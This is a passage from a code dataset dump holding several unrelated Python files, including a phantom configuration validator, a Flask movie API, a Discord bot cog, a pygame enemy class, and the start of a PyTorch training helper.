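\n# Example (added): boundary behaviour of validate_perc_of_scat above\n#   validate_perc_of_scat(0)   -> error string (the percentage must be > 0)\n#   validate_perc_of_scat(35)  -> \"\" (accepted silently)\n#   validate_perc_of_scat(100) -> \"\" but a UserWarning is emitted\n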
\n\ndef validate_scat_gain(structure_type, scat_gain):\n    \"\"\"!\n    \\brief Checks if the relative amplitude of the scatterers of a region is valid\n\n    \\param structure_type The structure for which the gain is being validated\n    \\param scat_gain The gain of the scatterers inside the structure\n\n    \\return An empty string if no error is found; an error string otherwise\n    \"\"\"\n\n    error_msg = \"\"\n\n    if scat_gain < 0:\n        error_msg = error_msg + \"Structure \" + structure_type + \": relative amplitude of the scatterers should be >= 0\\r\\n\"\n\n    return error_msg\n\n\ndef validate_phantom_format(phantom_format):\n    \"\"\"!\n    \\brief Checks if the phantom compatibility format is valid\n\n    \\param phantom_format The string with the phantom format (compatible toolbox)\n\n    \\return An empty string if no error is found; an error string otherwise\n    \"\"\"\n\n    error_msg = \"\"\n\n    supported_formats = [\"effec_scatterers\", \"k_wave\"]\n\n    if phantom_format not in supported_formats:\n        error_msg = 'The format ' + phantom_format + \" is not supported.\\r\\n\"\n        error_msg = error_msg + \"Supported formats are:\"\n        for dist in supported_formats:\n            error_msg = error_msg + \" \" + dist\n\n        error_msg = error_msg + \".\\r\\n\"\n\n    return error_msg\n\n\ndef validate_structures(structures, num_of_rows, num_of_cols, num_of_z):\n    \"\"\"!\n    \\brief Checks if the structures are valid (are within boundaries and\n    contain all parameters)\n\n    \\param structures All the structures present in the configuration file\n    \\param num_of_rows Number of rows of the phantom\n    \\param num_of_cols Number of columns of the phantom\n    \\param num_of_z Number of slices of the phantom (3-D phantoms)\n\n    \\return An empty string if no error is found; an error string otherwise\n    \"\"\"\n\n    error_msg = \"\"\n\n    supported_structures = [\"circle\", \"ellipse\", \"rectangle\", \"free_polygon\", \"points\", \"sphere\"]\n\n    for region in structures:\n        region_type = region[\"type\"].lower()\n        if region_type not in supported_structures:\n            error_msg = error_msg + 'The structure of type ' + region_type + \" is not supported.\\r\\n\"\n            error_msg = error_msg + \"Supported structures are:\"\n            for structure in supported_structures:\n                error_msg = error_msg + \" \" + structure\n        else:\n            error_msg = error_msg + validate_scat_gain(region[\"type\"], region[\"scat_gain\"])\n            if region_type == \"circle\":\n                circ = struc.Circle([struc.Point(region[\"center_xy\"])], region[\"radius\"])\n                error_msg = error_msg + circ.validate(num_of_rows, num_of_cols)\n            elif region_type == \"ellipse\":\n                ell = struc.Ellipse([struc.Point(region[\"center_xy\"])], region[\"semi_axis_x\"], region[\"semi_axis_y\"], region[\"rotation_angle_deg\"])\n                error_msg = error_msg + ell.validate(num_of_rows, num_of_cols)\n            elif region_type == \"rectangle\":\n                rec = struc.Rectangle([struc.Point((region[\"top_left_corner_xy\"]))], region[\"length_x\"], region[\"length_y\"])\n                error_msg = error_msg + rec.validate(num_of_rows, num_of_cols)\n            elif region_type == \"free_polygon\":\n                polygon = []\n                for point in range(len(region[\"vertices_xy\"])):\n                    polygon.append(struc.Point(region[\"vertices_xy\"][point]))\n\n                poly = struc.Polygon(polygon)\n                error_msg = error_msg + poly.validate(num_of_rows, num_of_cols)\n            elif region_type == \"points\":\n                points = []\n                for point in range(len(region[\"coordinates_xy\"])):\n                    points.append(struc.Point(region[\"coordinates_xy\"][point]))\n\n                s_points = struc.SinglePoint(points)\n                error_msg = 
error_msg + s_points.validate(num_of_rows, num_of_cols)\n            elif region_type == \"sphere\":\n                sp = struc.Sphere([struc.Point(region[\"center_xyz\"])], region[\"radius\"])\n                error_msg = error_msg + sp.validate(num_of_rows, num_of_cols, num_of_z)\n\n    return error_msg\n\n\ndef validate_configuration(configuration):\n    \"\"\"!\n    \\brief Checks if the phantom parameters are valid\n\n    \\note Raises an exception if there is any error\n\n    \\param configuration The parsed configuration\n\n    \\return An empty string if no error is found; an error string otherwise\n    \"\"\"\n\n    error_msg = \"\"\n\n    image_path = configuration.get(\"image_path\", \"\")\n\n    if image_path == \"\":\n        check_parameters_are_present(configuration, False)\n    else:\n        check_parameters_are_present(configuration, True)\n\n    # Statistical distribution used to generate the scatterers\n    error_msg = error_msg + validate_distribution(configuration[\"distribution\"].lower())\n\n    # Percentage of scatterers (non-zero elements) in the final matrix\n    perc_of_scatterers = configuration[\"perc_of_scatterers\"]\n    error_msg = error_msg + validate_perc_of_scat(perc_of_scatterers)\n\n    # Phantom format\n    phantom_format = configuration[\"phantom_format\"].lower()\n    error_msg = error_msg + validate_phantom_format(phantom_format)\n\n    if image_path == \"\":\n        # Matrix size\n        rows = configuration[\"rows_y\"]\n        cols = configuration[\"cols_x\"]\n        num_of_z = configuration.get(\"depth_z\", 1)\n        if (num_of_z > 1) and (phantom_format == \"effec_scatterers\"):\n            error_msg = error_msg + \"effec_scatterers only supports 2-D phantoms\\r\\n\"\n\n        # Check if the structures defined are valid\n        error_msg = error_msg + validate_structures(configuration[\"structures\"], rows, cols, num_of_z)\n    else:\n        input_image = Path(image_path)\n\n        if not input_image.is_file() and not input_image.is_dir():\n            raise Exception(\"Input image \\\"\" + image_path + \"\\\" was not found.\")\n\n        if (phantom_format != \"effec_scatterers\"):\n            error_msg = error_msg + \"Using an image as input is supported only with the effec_scatterers format\\r\\n\"\n\n    return error_msg\n","repo_name":"medeirosjd/phantom_generator","sub_path":"mx_us_phantom/config_validation.py","file_name":"config_validation.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"18718754460","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('search', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='film',\n            name='latitude',\n            field=models.CharField(max_length=200, default=datetime.datetime(2015, 8, 28, 1, 7, 4, 507069, tzinfo=utc)),\n            preserve_default=False,\n        ),\n        migrations.AddField(\n            model_name='film',\n            name='longitude',\n            field=models.CharField(max_length=200, default=datetime.datetime(2015, 8, 28, 1, 7, 20, 821824, tzinfo=utc)),\n            preserve_default=False,\n        ),\n    ]\n","repo_name":"CodeLizards/Uber-Coding-Challenge-SF-Movies","sub_path":"search/migrations/0002_auto_20150828_0107.py","file_name":"0002_auto_20150828_0107.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"15346479003","text":"import logging\nimport re\n\nlogger = logging.getLogger(__name__)\n\n# global dictionary of permitted combinations of values by 
backend\npermitted = {\n    'ACSIS': {\n        'inbeam': [\"POL\"],\n        'sideband': [\"LSB\", \"USB\"],\n        'sideband_filter': [\"DSB\", \"SSB\", \"2SB\"],\n        'switching_mode': [\"CHOP\", \"FREQSW\", \"NONE\", \"PSSW\"]\n    },\n\n    'DAS': {\n        'inbeam': [\"ROVER\"],\n        'sideband': [\"LSB\", \"USB\"],\n        'sideband_filter': [\"DSB\", \"SSB\", \"UNKNOWN\"],\n        'switching_mode': [\"CHOP\", \"FREQSW\", \"NONE\", \"PSSW\"]\n    },\n\n    'AOS-C': {\n        'sideband': [\"LSB\", \"USB\"],\n        'sideband_filter': [\"DSB\", \"SSB\", 'UNKNOWN'],\n        'switching_mode': [\"CHOP\", \"FREQSW\", \"NONE\", \"PSSW\"]\n    },\n\n    'SCUBA-2': {\n        'inbeam': [\"BLACKBODY\", \"FTS2\", \"POL\", \"POL2_CAL\",\n                   \"POL2_WAVE\", \"POL2_ANA\", \"SHUTTER\"],\n        'switching_mode': [\"NONE\", \"SELF\", \"SPIN\"]\n    }\n}\n\n\ndef instrument_keywords(strictness, frontend, backend, keyword_dict):\n    \"\"\"\n    Generates a list of keywords for the CAOM-2 field Instrument.keywords.\n\n    Keywords to add are passed in through a dictionary, which allows special\n    processing to be applied to particular keywords.\n\n    Arguments:\n    strictness: one of 'raw', 'stdpipe', or 'external', where raw means every\n                violation of standards is reported as an error, 'stdpipe'\n                allows some missing values that can legitimately be dropped\n                during normal processing, and 'external' reports invalid values\n                but ignores missing keywords and always returns bad=False.\n    frontend: receiver name\n    backend: spectrometer name for heterodyne observations\n    keyword_dict: a dictionary containing candidate keywords. Keys for the\n        dictionary include:\n        inbeam: list of optical devices in the optical path\n        x_scan_pat: scan pattern (x makes it the last item in a sorted list)\n        sideband: for heterodyne observations, the signal sideband (USB, LSB)\n        sideband_filter: single or double sideband (SSB, DSB)\n        switching_mode: the switching mode in use\n\n    Returns a tuple containing:\n    bad: True if an error was encountered, False otherwise\n    keywords: a list containing the keywords to be used\n\n    Usage: (omitting error checking)\n    For a raw observation:\n        frontend = common['instrume'].upper()\n        backend = common['backend'].upper()\n        keyword_dict = {}\n        keyword_dict['switching_mode'] = common['sw_mode']\n        keyword_dict['inbeam'] = common['inbeam']\n        if backend in ('ACSIS', 'DAS', 'AOS-C'):\n            keyword_dict['sideband'] = subsystem['obs_sb']\n            keyword_dict['sideband_filter'] = subsystem['sb_mode']\n        mybad, keywords = instrument_keywords('raw', frontend, backend,\n                                              keyword_dict)\n    For processed data:\n        keyword_dict = {}\n        keyword_dict['frontend'] = header['INSTRUME']\n        keyword_dict['backend'] = header['BACKEND']\n        keyword_dict['switching_mode'] = header['SW_MODE']\n        keyword_dict['inbeam'] = header['INBEAM']\n        if header['BACKEND'] in ('ACSIS', 'DAS', 'AOS-C'):\n            keyword_dict['sideband'] = header['OBS_SB']\n            keyword_dict['sideband_filter'] = header['SB_MODE']\n        mybad, keywords = instrument_keywords('stdpipe',\n                                              frontend,\n                                              backend,\n                                              keyword_dict)\n    \"\"\"\n    bad = False\n\n    # The backend is not mandatory for external data products, but the\n    # rest of the backend-dependent validity checks must then be skipped\n\n    # This first block of code just reports warnings and sets bad to True\n    myBackend = backend.strip().upper()\n    myFrontend = frontend.strip().upper()\n\n    if myBackend not in permitted:\n        logger.warning('instrument_keywords does not recognize ' +\n                       '\"%s\" as a permitted backend', backend)\n        bad = True\n    else:\n        # The remaining checks only work if the backend is permitted\n        if myBackend in ('ACSIS', 'DAS', 'AOS-C'):\n            if 'sideband' not in keyword_dict and 
strictness == 'raw':\n                logger.warning('with strictness = %s'\n                               ' backend = %s'\n                               ' frontend = %s'\n                               ' sideband is not defined',\n                               strictness, backend, frontend)\n                bad = True\n            if 'sideband' in keyword_dict:\n                sideband = keyword_dict['sideband'].strip().upper()\n                if sideband not in permitted[myBackend]['sideband']:\n                    logger.warning('sideband %s'\n                                   ' is not in the list permitted for %s: %s',\n                                   sideband, myBackend,\n                                   repr(permitted[myBackend]['sideband']))\n                    bad = True\n\n            if ('sideband_filter' not in keyword_dict and\n                    strictness != 'external'):\n\n                logger.warning('sideband_filter is not defined')\n                bad = True\n            if 'sideband_filter' in keyword_dict:\n                sideband_filter = \\\n                    keyword_dict['sideband_filter'].strip().upper()\n\n                # Sideband filter was not recorded before 1994-04-14 and is\n                # stored as a blank '' in ACSIS for DAS and AOS-C data. It can\n                # be interpreted as DSB for every receiver except RXB3,\n                # where a blank really means UNKNOWN, forcing the keyword to be\n                # omitted.\n                if sideband_filter == '' and frontend != 'RXB3':\n                    sideband_filter = 'DSB'\n                    keyword_dict['sideband_filter'] = sideband_filter\n\n                elif sideband_filter == 'UNKNOWN' and backend in ['DAS',\n                                                                  'AOS-C']:\n                    del keyword_dict['sideband_filter']\n\n                elif (sideband_filter not in\n                        permitted[myBackend]['sideband_filter']):\n                    logger.warning(\n                        'sideband_filter %s'\n                        ' is not in the list permitted for %s: %s',\n                        sideband_filter, backend,\n                        repr(permitted[myBackend]['sideband_filter']))\n                    bad = True\n        else:\n            if 'sideband' in keyword_dict:\n                logger.warning('sideband is not permitted for %s',\n                               backend)\n                bad = True\n\n            if 'sideband_filter' in keyword_dict:\n                logger.warning('sideband_filter is not permitted for %s',\n                               backend)\n                bad = True\n\n        if 'switching_mode' not in keyword_dict and strictness == 'raw':\n            logger.warning('switching_mode is not defined')\n            bad = True\n        if 'switching_mode' in keyword_dict:\n            switching_mode = keyword_dict['switching_mode'].strip().upper()\n            # DAS observations often have 'FREQ' instead of 'FREQSW'\n            if switching_mode == 'FREQ':\n                switching_mode = 'FREQSW'\n                keyword_dict['switching_mode'] = switching_mode\n\n            if switching_mode not in permitted[myBackend]['switching_mode']:\n                logger.warning('switching_mode %s'\n                               ' is not in the list permitted for %s: %s',\n                               switching_mode, backend,\n                               repr(permitted[myBackend]['switching_mode']))\n                bad = True\n\n    # If there were no actual errors, compose the keyword list\n    keywords = []\n    if not bad:\n        for key in sorted(keyword_dict.keys()):\n            if key == 'inbeam':\n                inbeam_list = re.split(r'\\s+',\n                                       keyword_dict['inbeam'].strip().upper())\n                for item in inbeam_list:\n                    if not re.search(r'POL|FTS|SHUTTER', item):\n                        keywords.append(item)\n            else:\n                keywords.append(keyword_dict[key].strip().upper())\n\n    return (bad, keywords)\n
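\n# Example (added): for a hypothetical ACSIS observation with\n#   keyword_dict = {'sideband': 'usb', 'sideband_filter': 'dsb',\n#                   'switching_mode': 'pssw', 'inbeam': 'pol'}\n# the call instrument_keywords('raw', 'HARP', 'ACSIS', keyword_dict) returns\n# (False, ['USB', 'DSB', 'PSSW']) -- the POL entry is filtered out of the\n# keyword list by the re.search above, and all values are upper-cased.\n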
","repo_name":"eaobservatory/python-jcmt2caom2","sub_path":"lib/jcmt2caom2/jsa/instrument_keywords.py","file_name":"instrument_keywords.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"4255509644","text":"from flask import Flask, request\nfrom flask_restx import Api, Resource\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom schemas import movie_schema, movies_schema # Import the schemas from schemas.py\nfrom models import * # Import the model classes for working with the DB\n\n\"\"\"Application configuration\"\"\"\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db' # Database address\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['JSON_AS_ASCII'] = False\napp.config['RESTX_JSON'] = {'ensure_ascii': False, 'indent': 3}\n\ndb = SQLAlchemy(app)\n\napi = Api(app) # Attach the Api\nmovie_ns = api.namespace('movies')\n\n\n@movie_ns.route(\"/\") # Main page\nclass MovieView(Resource):\n\n    def get(self):\n        all_movies = db.session.query(Movie.id,\n                                      Movie.title,\n                                      Movie.description,\n                                      Movie.rating,\n                                      Movie.trailer,\n                                      Genre.name.label('genre'),\n                                      Director.name.label('director')).join(Genre).join(Director)\n\n        director_id = request.args.get('director_id')\n        genre_id = request.args.get('genre_id')\n        if director_id:\n            all_movies = all_movies.filter(Movie.director_id == director_id)\n        if genre_id:\n            all_movies = all_movies.filter(Movie.genre_id == genre_id)\n\n        return movies_schema.dump(all_movies), 200\n\n    def post(self): # Add a new record to the database\n        req_json = request.json\n        new_movie = Movie(**req_json)\n        with db.session.begin():\n            db.session.add(new_movie)\n        return f\"New movie {new_movie.id} added\", 201\n\n\n@movie_ns.route(\"/<int:movie_id>\") # Operations on a DB object by its id\nclass MovieDetailView(Resource):\n\n    def get(self, movie_id: int): # Get an object by id\n        movie = db.session.query(Movie).get(movie_id)\n        if movie:\n            return movie_schema.dump(movie), 200\n        return \"Movie not found\", 404\n\n    def put(self, movie_id: int): # Update an object by id\n        movie = db.session.query(Movie).get(movie_id) # Fetch the target object from the DB by id\n        if not movie: # If no object with this id is found, return an error\n            return f\"There is no movie with id {movie_id}\", 404\n        req_json = request.json\n\n        movie.title = req_json['title']\n        movie.description = req_json['description']\n        movie.trailer = req_json['trailer']\n        movie.year = req_json['year']\n        movie.rating = req_json['rating']\n        movie.genre_id = req_json['genre_id']\n        movie.director_id = req_json['director_id']\n\n        db.session.add(movie)\n        db.session.commit()\n        return f\"Movie with id {movie_id} updated\", 204\n\n    def delete(self, movie_id: int): # Delete an object by id\n        movie_to_del = db.session.query(Movie).get(movie_id)\n        if not movie_to_del:\n            return f\"Movie with id {movie_id} not found\", 404\n        db.session.delete(movie_to_del)\n        db.session.commit()\n        return \"\", 204\n
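\n# Usage sketch (added; paths follow the 'movies' namespace registered above):\n#   GET  /movies/?director_id=2&genre_id=4  -> movie list filtered by query args\n#   POST /movies/  (with a JSON body)       -> creates a movie, returns 201\n#   GET  /movies/1                          -> one movie by id, 404 if missing\n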
\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"MariaKovalyova/lesson_17","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"30815679085","text":"import json\nimport sys\nimport traceback\n\nimport discord\nfrom discord.ext import commands, tasks\nfrom discord.utils import get\n\nimport errors\nimport data\nimport validation\nimport rally_api\n\nfrom cogs import update_cog\n\nfrom utils import pretty_print\nfrom constants import *\n\n\nclass ChannelCommands(commands.Cog):\n\n    \"\"\"\n    Cog for processing commands from a specific channel.\n    Deals with removing, adding, and viewing mappings from Creator Coin to a channel.\n    \"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    async def cog_after_invoke(self, ctx):\n        await pretty_print(\n            ctx, \"Command completed successfully!\", title=\"Success\", color=SUCCESS_COLOR\n        )\n\n    @errors.standard_error_handler\n    async def cog_command_error(self, ctx, error):\n        \"\"\"\n        A special method that is called whenever an error is dispatched inside this cog.\n        This is similar to on_command_error() except only applying to the commands inside this cog.\n\n        Parameters\n        __________\n\n        ctx (Context) – The invocation context where the error happened.\n        error (CommandError) – The error that happened.\n\n        \"\"\"\n\n        print(\"Ignoring exception in command {}:\".format(ctx.command), file=sys.stderr)\n        traceback.print_exception(\n            type(error), error, error.__traceback__, file=sys.stderr\n        )\n\n    @commands.command(\n        name=\"set_channel_mapping\",\n        help=\"<coin_name> <coin_amount> <channel> \"\n        + \"Set a mapping between coin and channel. Channel membership will be constantly updated.\",\n    )\n    @validation.owner_or_permissions(administrator=True)\n    async def set_coin_for_channel(\n        self, ctx, coin_name, coin_amount: int, channel: discord.TextChannel\n    ):\n        data.add_channel_coin_mapping(\n            ctx.guild.id, coin_name, coin_amount, channel.name\n        )\n        await update_cog.force_update(self.bot, ctx)\n\n    @commands.command(\n        name=\"one_time_channel_mapping\",\n        help=\"<coin_name> <coin_amount> <channel>\"\n        + \" Grant/deny access to a channel instantly.\",\n    )\n    @validation.owner_or_permissions(administrator=True)\n    async def one_time_channel_mapping(\n        self, ctx, coin_name, coin_amount: int, channel: discord.TextChannel\n    ):\n\n        for member in ctx.guild.members:\n            rally_id = data.get_rally_id(member.id)\n            if rally_id:\n                balances = rally_api.get_balances(rally_id)\n                await update_cog.grant_deny_channel_to_member(\n                    {\n                        data.GUILD_ID_KEY: ctx.guild.id,\n                        data.COIN_KIND_KEY: coin_name,\n                        data.REQUIRED_BALANCE_KEY: coin_amount,\n                        data.CHANNEL_NAME_KEY: channel.name,\n                    },\n                    member,\n                    balances,\n                )\n        await update_cog.force_update(self.bot, ctx)\n\n    @commands.command(\n        name=\"unset_channel_mapping\",\n        help=\"<coin_name> <coin_amount> <channel> \"\n        + \"Unset a mapping between coin and channel\",\n    )\n    @validation.owner_or_permissions(administrator=True)\n    async def unset_coin_for_channel(\n        self, ctx, coin_name, coin_amount: int, channel: discord.TextChannel\n    ):\n        data.remove_channel_mapping(ctx.guild.id, coin_name, coin_amount, channel.name)\n\n    @commands.command(name=\"get_channel_mappings\", help=\"Get channel mappings\")\n    @validation.owner_or_permissions(administrator=True)\n    async def get_channel_mappings(self, ctx):\n        await ctx.send(\n            json.dumps(\n                [\n                    json.dumps(mapping)\n                    for mapping in data.get_channel_mappings(ctx.guild.id)\n                ]\n            )\n        )\n\n    @commands.command(name=\"set_purchase_message\", help=\"Change the $purchase message\")\n    @validation.owner_or_permissions(administrator=True)\n    async def set_purchase_message(self, ctx, *, message):\n        data.set_purchase_message(ctx.guild.id, message)\n\n    @commands.command(name=\"purchase\", help=\"Learn how you can purchase\")\n    @commands.guild_only()\n    async def purchase(self, ctx):\n        message = data.get_purchase_message(ctx.guild.id)\n        if message is not None:\n            await ctx.send(message)\n        else:\n            await ctx.send(DEFAULT_PURCHASE_MESSAGE)\n\n    @commands.command(name=\"set_donate_message\", help=\"Change the $donate message\")\n    @validation.owner_or_permissions(administrator=True)\n    async def set_donate_message(self, ctx, *, message):\n        data.set_donate_message(ctx.guild.id, message)\n\n    @commands.command(name=\"donate\", help=\"Learn how you can donate\")\n    @commands.guild_only()\n    async def donate(self, ctx):\n        message = data.get_donate_message(ctx.guild.id)\n        if message is not None:\n            await ctx.send(message)\n        else:\n            await ctx.send(DEFAULT_DONATE_MESSAGE)\n
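\n# Usage sketch (added; '!' is an assumed command prefix and StanleyCoin is a\n# made-up coin name -- the real prefix is configured elsewhere in the bot):\n#   !set_channel_mapping StanleyCoin 100 #vip-lounge\n# maps #vip-lounge to a required balance of 100 StanleyCoin, and channel\n# membership is then re-checked on the next update pass.\n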
","repo_name":"nemani/RallyRoleBot","sub_path":"rallyrolebot/cogs/channel_cog.py","file_name":"channel_cog.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"}
{"seq_id":"28704279333","text":"import json\nfrom datetime import datetime\nfrom asgiref.sync import async_to_sync\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom crawler.models import Classification\nfrom channels.layers import get_channel_layer\n\ncurrent_rank_data = None\n\n# Called automatically whenever a value is saved to the recommendation table. However, calling update_or_create keeps triggering it -- update_or_create seems to call save() internally...\n@receiver(post_save, sender=Classification)\ndef send_signal(sender, **kwargs):\n\n    print(\"socket signal fired\")\n    try:\n        # See https://stackoverflow.com/questions/21925671/how-to-convert-django-model-object-to-dict-with-its-fields-and-values\n        recommendation = Classification.objects.filter(ranked_date=str(datetime.today().strftime('%Y-%m-%d'))).values()[0]\n    except Exception as e:\n        print(e)\n        return\n\n    global current_rank_data\n    data = json.dumps(recommendation, cls=DjangoJSONEncoder, ensure_ascii=False)\n    if current_rank_data != data: # Cache the ranking data; if it differs from the previous value, send it to the connected clients.\n        current_rank_data = data\n        channel_layer = get_channel_layer()\n        async_to_sync(channel_layer.group_send)(\n            \"ASTS\",\n            {\n                'type': 'client_notification',\n                'data': data\n            }\n        )\n    else:\n        return\n\n\n\n\n","repo_name":"chb1828/automatic-stock-trading-system-server","sub_path":"client_socket/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"72631874828","text":"# Write a program to find the sum of the digits of a number accepted from the user.\n\nNum=int(input(\"Enter a number:\"))\nsumn=0\nrem=0\nwhile Num>0:\n    rem=Num%10\n    sumn=sumn+rem\n    Num=Num//10\nprint(\"sum of given num is:\",sumn)\n","repo_name":"Prashanth-PL/VN2-T03-100","sub_path":"_08_Loops/self_notes/12_sum_of_digits_of_number.py","file_name":"12_sum_of_digits_of_number.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"6351116485","text":"import math\nimport pygame\nimport key\n\nclass Enemy:\n    def __init__(self, pos, size, speed):\n        self.pos = pos # self.pos[0] --> x self.pos[1] --> y\n        self.size = size # size of the enemy\n        self.speed = speed # speed of the enemy\n        self.t=speed # angle in degrees for the circular movement\n\n    # Function to draw the enemy\n    def draw(self, screen):\n        # Draw the enemy's black border\n        pygame.draw.rect(screen, key.BLACK_BORDER , (self.pos[0], self.pos[1], self.size, self.size))\n        # Draw the enemy's interior\n        pygame.draw.rect(screen, key.ENEMY_COLOUR , (self.pos[0]+3, self.pos[1]+3, self.size-6, self.size-6))\n\n\n    # Function to move the enemy horizontally\n    def move_horizontal(self, x1, x2) :\n\n        # Move the enemy horizontally\n        self.pos[0] += self.speed\n        # If it goes past the left limit\n        if self.pos[0] <= x1 :\n            self.pos[0] = x1 # Clamp x to the leftmost position the enemy can be at\n            self.speed = -1 * self.speed # Reverse the direction of the velocity\n        # If it goes past the right limit\n        elif self.pos[0] >= x2 :\n            self.pos[0] = x2 # Clamp x to the rightmost position the enemy can be at\n            self.speed = -1 * self.speed # Reverse the direction of the velocity\n\n\n
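    # Worked example (added): with speed = 3 and limits x1 = 0, x2 = 200, an\n    # enemy at x = 199 moving right is clamped to x = 200 and its speed flips\n    # to -3, so repeated calls make it patrol back and forth between the limits.\n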
    # Function to move the enemy vertically\n    def move_vertical(self, y1, y2) :\n        \n        # Move the enemy vertically\n        self.pos[1] += self.speed\n        # If it goes past the top limit\n        if self.pos[1] <= y1 :\n            self.pos[1] = y1 # Clamp y to the highest position the enemy can be at\n            self.speed = -1 * self.speed # Reverse the direction of the velocity\n        # If it goes past the bottom limit\n        elif self.pos[1] >= y2 :\n            self.pos[1] = y2 # Clamp y to the lowest position the enemy can be at\n            self.speed = -1 * self.speed # Reverse the direction of the velocity\n        \n        \n    # Function to move the enemy in a circle\n    def move_circ(self,a,b,r):\n        t=math.radians(self.t)\n        self.pos[0] = r * math.cos(t) + a\n        self.pos[1] = r * math.sin(t) + b\n        self.t += 2\n        if self.t >= 360:\n            self.t = 0\n
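\n    # Worked example (added): with centre (a, b) = (100, 100) and r = 50 the\n    # enemy traces pos = (100 + 50*cos(t), 100 + 50*sin(t)); t advances 2\n    # degrees per call, so a full revolution takes 180 calls.\n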
\n","repo_name":"ignitasalex/sad","sub_path":"Final/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"38901630871","text":"from aquarium import Aquarium\nfrom clownfish import Clownfish\nfrom tang import Tang\nfrom kong import Kong\n\naquarium = Aquarium()\n\n# checking what happens with empty aquarium\naquarium.get_status()\naquarium.feed()\naquarium.remove_fat_fishes()\n\n# creating fishes\nclownfish_1 = Clownfish(\"Laughy\", 9, \"orange\", \"white\")\nclownfish_2 = Clownfish(\"Funny\", 10, \"yellow\", \"pink\")\ntong_1 = Tang(\"Dumby\", 7, \"blue\")\nkong_1 = Kong(\"Fatty\", 18, \"grey\")\n\n# adding fishes to the aquarium\naquarium.add_fish(clownfish_1)\naquarium.add_fish(clownfish_2)\naquarium.add_fish(tong_1)\naquarium.add_fish(kong_1)\n\n# testing\n\n\ndef test_feeding():\n    print(\"# feeding the aquarium:\")\n    aquarium.feed()\n    print_status()\n\n\ndef test_removing():\n    print(\"# removing fat fishes:\")\n    aquarium.remove_fat_fishes()\n    print_status()\n\n\ndef print_status():\n    aquarium.get_status()\n\n\nprint(\"# Aquarium with fishes:\")\nprint_status()\n\ntest_feeding()\n\ntest_removing()\n\ntest_feeding()\ntest_feeding()\n\ntest_removing()\n","repo_name":"Komaxor/ibs-2020-10-application-development-normal-exam","sub_path":"aquarium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"33004758040","text":"import os\nimport json\nfrom collections import OrderedDict\n\nfrom tqdm import tqdm_notebook\nfrom tqdm.autonotebook import trange\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\n\nfrom torchvision import models\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .models import UpCi2\n\ndef get_model_UpSi2(out_classes=2, device=None, modes=[1, 1, 1], down_conv=False):\n\tassert len(modes) == 3, 'len(modes) not 3'\n\tresnet18 = models.resnet18(pretrained=True)\n\tfor itm in resnet18.parameters():\n\t\titm.requires_grad = False\n\tresnet_layers = {'conv1': resnet18.conv1, 'bn1': resnet18.bn1, 'relu': resnet18.relu,\n\t\t\t\t\t 'maxpool': resnet18.maxpool, 'layer1': resnet18.layer1, 'layer2': resnet18.layer2,\n\t\t\t\t\t 'layer3': resnet18.layer3, 'layer4': resnet18.layer4, 'avgpool': resnet18.avgpool}\n\tresnet_keys_list = list(resnet_layers.keys())\n\tresnet_1_dct, resnet_2_dct, resnet_3_dct, resnet_4_dct, = OrderedDict(), OrderedDict(), OrderedDict(), OrderedDict()\n\tfor key in resnet_keys_list[:5]:\n\t\tresnet_1_dct.update({key: resnet_layers[key]})\n\tresnet_2_dct.update({'layer2': resnet_layers['layer2']})\n\tresnet_3_dct.update({'layer3': resnet_layers['layer3']})\n\tresnet_4_dct.update({'layer4': resnet_layers['layer4']})\n\tresnet_4_dct.update({'avgpool': resnet_layers['avgpool']})\n\tresnet_1, resnet_2 = nn.Sequential(resnet_1_dct), nn.Sequential(resnet_2_dct)\n\tresnet_3, resnet_4 = nn.Sequential(resnet_3_dct), nn.Sequential(resnet_4_dct)\n\tmodel = UpCi2(out_classes=out_classes, rs=[resnet_1, resnet_2, resnet_3, resnet_4], modes=modes, down_conv=down_conv)\n\treturn model.to(device)\n\ndef save_logs(losses, accuracy, name):\n\tif 'logs' not in os.listdir():\n\t\tos.mkdir('logs')\n\tif name not in os.listdir('logs'):\n\t\tos.mkdir('logs/' + name)\n\tfor dct_name, dct in zip(['losses', 'accuracy'], [losses, accuracy]):\n\t\twith open('logs/' + name + '/' + dct_name + '.json', 'w') as f:\n\t\t\tjson.dump(dct, f)\n\n\ndef train_model_UpSi2(model, device, dataloaders, losses_weights=[1, 1, 1], num_epochs=15, modes='all',\n\t\t\t\t\t\tdown_conv=False, save_log=True, name='test', save_model=1, show_tests=False, test_data=None):\n\t\"\"\"\n\tmodel: 